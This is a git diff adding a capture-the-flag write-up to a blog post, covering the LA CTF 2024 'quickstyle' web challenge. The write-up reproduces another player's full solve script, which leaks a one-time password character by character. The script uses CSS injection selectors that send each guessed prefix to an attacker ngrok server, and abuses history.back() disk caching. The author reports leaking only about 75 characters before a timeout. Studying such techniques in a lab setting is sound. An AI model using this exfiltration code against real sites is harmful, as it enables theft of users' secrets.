PSDat123
diff --git a/‎_posts/2024-02-19-LA-CTF-2024.md‎
Lines changed: 123 additions & 0 deletions b/‎_posts/2024-02-19-LA-CTF-2024.md‎
Lines changed: 123 additions & 0 deletions
diff --git a/‎assets/img/LA-CTF-2024/quickstyle-1.png‎
28.1 KB b/‎assets/img/LA-CTF-2024/quickstyle-1.png‎
28.1 KB
@@ -461,6 +461,129 @@ Reference:
 - [https://github.com/uclaacm/lactf-archive/tree/main/2024/web/quickstyle/solve](https://github.com/uclaacm/lactf-archive/tree/main/2024/web/quickstyle/solve)
 - [https://gist.github.com/arkark/5787676037003362131f30ca7c753627](https://gist.github.com/arkark/5787676037003362131f30ca7c753627)
 
+The intended solution was to use a variant of [3-combo](https://www.sonarsource.com/blog/code-vulnerabilities-leak-emails-in-proton-mail/#multiple-requests-per-element-crossfade) to leak a one-time password.
+
+But after reading other people writeup, I found that arkark's [solution](https://gist.github.com/arkark/5787676037003362131f30ca7c753627) was the most simple and easy to understand. The idea was to not let the server regenerate the otp by abusing the disk cache on the client-side. 
+
+The flow was go to website (generate otp) -> leak first character via css -> go to about:blank -> use history.back() to use the disk cache (doesn't generate otp) -> leak second character and so on...
+
+Note: Script executed in about:blank, in this case `history.back()` is considered to be same origin in the [document](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy#inherited_origins), so the SOP won't block navigating back via `history` object.  
+
+**Solve script from arkark's writeup**
+```js
+const app = require('fastify')({});
+const path = require('node:path');
+
+const ATTACKER_BASE_URL =
+  'https://<ngrok-id>.ngrok-free.app';
+
+const user = 'username_xxxxx';
+
+app.addHook('onSend', async (res, reply) => {
+  reply.header('Access-Control-Allow-Origin', '*');
+});
+
+app.register(require('@fastify/static'), {
+  root: path.join(__dirname, 'public'),
+  prefix: '/'
+});
+
+const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));
+
+let known = '';
+const TARGET_LEN = 80;
+const CHARS = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
+
+app.get('/cssi', async (req, reply) => {
+  let css = '';
+  for (const c of CHARS) {
+    css += `
+      input[value ^= "${known}${c}"] {
+        background: url("${ATTACKER_BASE_URL}/cssi/leak?prefix=${known}${c}");
+      }
+    `.trim();
+  }
+
+  const html = `
+    <style>${css}</style>
+    <form name="querySelectorAll"></form>
+  `.trim();
+
+  return reply.type('html').send(html);
+});
+
+app.get('/cssi/leak', async (req, reply) => {
+  known = req.query.prefix.trim();
+  console.log({ len: known.length, known });
+  if (known.length === TARGET_LEN) {
+    console.log({ user, otp: known });
+    app.close();
+  }
+  return '';
+});
+
+app.get('/cssi/prefix', async (req, reply) => {
+  const len = parseInt(req.query.len);
+  while (known.length < len) {
+    await sleep(10);
+  }
+  return known;
+});
+
+app.listen({ address: '0.0.0.0', port: 8080 }, (err) => {
+  if (err) throw err;
+});
+```
+{: file="index.js" }
+
+```html
+<body>
+  <script>
+    // const BASE_URL = "http://web:3000";
+    const BASE_URL = "https://quickstyle.chall.lac.tf";
+
+    const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms));
+
+    const back = async (win) => {
+      while (true) {
+        try {
+          console.log(win.history);
+          win.history.back();
+          return;
+        } catch {
+          await sleep(10);
+        }
+      }
+    };
+
+    const TARGET_LEN = 80;
+
+    const main = async () => {
+      const user = "username_xxxxx";
+      const page = `${location.origin}/cssi`;
+      const win = open(`${BASE_URL}/?${new URLSearchParams({ user, page })}`);
+
+      for (let len = 1; len < TARGET_LEN; len++) {
+        await fetch(`/cssi/prefix?len=${len}`);
+        win.location = `about:blank`;
+        await back(win);
+      }
+    };
+    main();
+  </script>
+</body>
+```
+{: file="public/index.html" }
+
+I used ngrok to expose the port and replaced the url in the server code. After that I started the server and sent the ngrok url to the bot.
+
+But I was only able to leak about ~73 characters of the otp and then it stop.
+ 
+![Stopped leaking](quickstyle-1.png)
+
+After check the bot code in the [challenge archive](https://github.com/uclaacm/lactf-archive/blob/main/2024/admin-bot/handlers/quickstyle.js), I saw that the bot has a 60-second timeout so that mean that I didn't leak the otp fast enough. This may be caused by ngrok or my machine/bot not being fast enough? I tried a couple more time and the most characters I was able to leak was 75.
+
+Despite not being able to solved it fully, I have learnt alot about css injection and chrome's caching policy. It was a great challenge!
 
 ## biscuit-of-totality
 Reference: